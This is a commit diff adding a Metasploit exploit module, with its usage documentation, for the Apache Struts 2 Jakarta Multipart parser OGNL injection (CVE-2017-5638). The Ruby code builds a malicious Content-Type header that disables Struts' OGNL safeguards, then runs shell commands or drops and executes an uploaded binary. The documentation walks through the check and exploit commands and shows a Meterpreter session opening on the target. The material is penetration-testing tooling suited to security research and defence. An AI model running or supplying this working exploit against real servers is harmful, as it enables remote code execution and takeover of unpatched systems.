Land rapid7#8103, Add CVE-2017-5638, Struts2 Content-Type OGNL injection

wchen-r7 · wchen-r7 · commit 173633263853 · 2017-03-14T16:10:49.000-05:00
diff --git a/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md b/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md
@@ -0,0 +1,104 @@
+```struts2_content_type_ognl``` is a module that exploits Apache Struts 2's Jakarta Multipart
+parser, which makes it possible to perform arbitrary code execution with a malicious HTTP
+```Content-Type``` value.
+
+## Vulnerable Application
+
+Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10 are vulnerable.
+
+You can download these versions here with any version of Apache Tomcat:
+
+http://archive.apache.org/dist/struts/
+
+You will also need to install a Struts 2 showcase application, which can be found here:
+
+https://mvnrepository.com/artifact/org.apache.struts/struts2-showcase
+
+## Options
+
+**TARGETURI**
+
+The path to a struts application action
+
+**VHOST**
+
+The HTTP server virtual host. You will probably need to configure this as well, even though it is
+set as optional.
+
+## Demonstration
+
+**The Check Command**
+
+The ```struts2_content_type_ognl``` module comes with a check command that can effectively check
+if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the
+following:
+
+```
+set VERBOSE true
+set RHOST [IP]
+set TARGETURI [path to the Struts app with an action]
+```
+
+When the module is in verbose mode, the ```check``` command will try to tell you the OS information,
+and whether or not the machine is vulnerable. Like this:
+
+```
+msf exploit(struts2_content_type_ognl) > check
+
+[+] Victim operating system: Linux
+[+] 10.1.11.11:8080 The target is vulnerable.
+```
+
+**Exploiting the Host**
+
+After identifying the vulnerability on the target machine, you can try to exploit it.
+
+The exploit supports mainly two platforms: Windows and Linux. To see a list of available payloads,
+try to do ```show payloads```, and pick one. The following example demonstrates us exploiting a
+vulnerable Ubuntu host:
+
+```
+msf exploit(struts2_content_type_ognl) > show options
+
+Module options (exploit/multi/http/struts2_content_type_ognl):
+
+   Name       Current Setting     Required  Description
+   ----       ---------------     --------  -----------
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST      10.1.11.11          yes       The target address
+   RPORT      8080                yes       The target port (TCP)
+   SSL        false               no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /struts2-showcase/  yes       The path to a struts application action
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/bind_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   DebugOptions  0                no        Debugging options for POSIX meterpreter
+   LPORT         4444             yes       The listen port
+   RHOST         10.1.11.11       no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Universal
+
+
+msf exploit(struts2_content_type_ognl) > run
+
+[*] Started bind handler
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+{"Server"=>"Apache-Coyote/1.1",
+ "Set-Cookie"=>"JSESSIONID=548FF051466E6C1F3AAE814E385057DE; Path=/; HttpOnly",
+ "Content-Type"=>"text/html;charset=UTF-8",
+ "Content-Length"=>"6335",
+ "Date"=>"Tue, 14 Mar 2017 21:04:06 GMT"}
+[*] Sending stage (1495599 bytes) to 10.1.11.11
+[*] Meterpreter session 5 opened (192.168.1.11:50671 -> 10.1.11.11:4444) at 2017-03-14 16:04:36 -0500
+
+meterpreter >
+```
diff --git a/modules/exploits/multi/http/struts2_content_type_ognl.rb b/modules/exploits/multi/http/struts2_content_type_ognl.rb
@@ -0,0 +1,229 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts Jakarta Multipart Parser OGNL Injection',
+      'Description'    => %q{
+        This module exploits a remote code execution vunlerability in Apache Struts
+        version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed
+        via http Content-Type header.
+
+        Native payloads will be converted to executables and dropped in the
+        server's temp dir. If this fails, try a cmd/* payload, which won't
+        have to write to the disk.
+      },
+      'Author'         => [
+        'Nike.Zheng', # PoC
+        'Nixawk',     # Metasploit module
+        'Chorder',    # Metasploit module
+        'egypt',      # combining the above
+        'Jeffrey Martin', # Java fu
+      ],
+      'References'     => [
+        ['CVE', '2017-5638'],
+        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
+      ],
+      'Privileged'     => true,
+      'Targets'        => [
+        [
+          'Universal', {
+            'Platform'   => %w{ unix windows linux },
+            'Arch'       => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+          },
+        ],
+      ],
+      'DisclosureDate' => 'Mar 07 2017',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
+        ]
+      )
+      register_advanced_options(
+        [
+          OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
+        ]
+      )
+
+    @data_header = "X-#{rand_text_alpha(4)}"
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+
+    ognl = ""
+    ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
+    ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
+
+    begin
+      resp = send_struts_request(ognl)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.headers[var_a]
+      vprint_good("Victim operating system: #{resp.headers[var_a]}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case payload.arch.first
+    #when ARCH_JAVA
+    #  datastore['LHOST'] = nil
+    #  resp = send_payload(payload.encoded_jar)
+    when ARCH_CMD
+      resp = execute_command(payload.encoded)
+    else
+      resp = send_payload(generate_payload_exe)
+    end
+
+    require'pp'
+    pp resp.headers if resp
+  end
+
+  def send_struts_request(ognl, extra_header: '')
+    uri = normalize_uri(datastore["TARGETURI"])
+    content_type = "%{(#_='multipart/form-data')."
+    content_type << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    content_type << "(#_memberAccess?"
+    content_type << "(#_memberAccess=#dm):"
+    content_type << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    content_type << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    content_type << "(#ognlUtil.getExcludedPackageNames().clear())."
+    content_type << "(#ognlUtil.getExcludedClasses().clear())."
+    content_type << "(#context.setMemberAccess(#dm))))."
+    content_type << ognl
+    content_type << "}"
+
+    headers = { 'Content-Type' => content_type }
+    if extra_header
+      headers[@data_header] = extra_header
+    end
+
+    #puts content_type.gsub(").", ").\n")
+    #puts
+
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'method'  => datastore['HTTPMethod'],
+      'headers' => headers
+    )
+
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    resp
+  end
+
+  def execute_command(cmd)
+    ognl = ''
+    ognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
+
+    # You can add headers to the server's response for debugging with this:
+    #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
+    #ognl << %q|(#r.addHeader('decoded',#cmd)).|
+
+    ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
+    ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|
+    ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|
+    ognl << %q|(#p.redirectErrorStream(true)).|
+    ognl << %q|(#process=#p.start())|
+
+    send_struts_request(ognl, extra_header: cmd)
+  end
+
+  def send_payload(exe)
+
+    ognl = ""
+    ognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
+    ognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).|
+    #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
+    #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|
+    ognl << %q|(#f.setExecutable(true)).|
+    ognl << %q|(#f.deleteOnExit()).|
+    ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|
+
+    # Using stuff from the sun.* package here means it likely won't work on
+    # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to
+    # work and I don't see a better way of getting binary data onto the
+    # system. =/
+    ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|
+    ognl << %q|(#fos.write(#d)).|
+    ognl << %q|(#fos.close()).|
+
+    ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
+    ognl << %q|(#p.start()).|
+    ognl << %q|(#f.delete())|
+
+    send_struts_request(ognl, extra_header: [exe].pack("m").delete("\n"))
+  end
+
+end
+
+=begin
+Doesn't work:
+
+    ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|
+    ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|
+    ognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).|
+    ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|
+    ognl << %q|(#m.invoke(null,null)).|
+
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).|  # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).|        # parse failed
+    #ognl << %q|(#m=#c.getMethod('run',null)).|                          # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6
+
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).|     # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).|       # parse failed
+    #ognl << %q|(#m=#c.getMethod('main',null)).|                         # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884
+
+=end
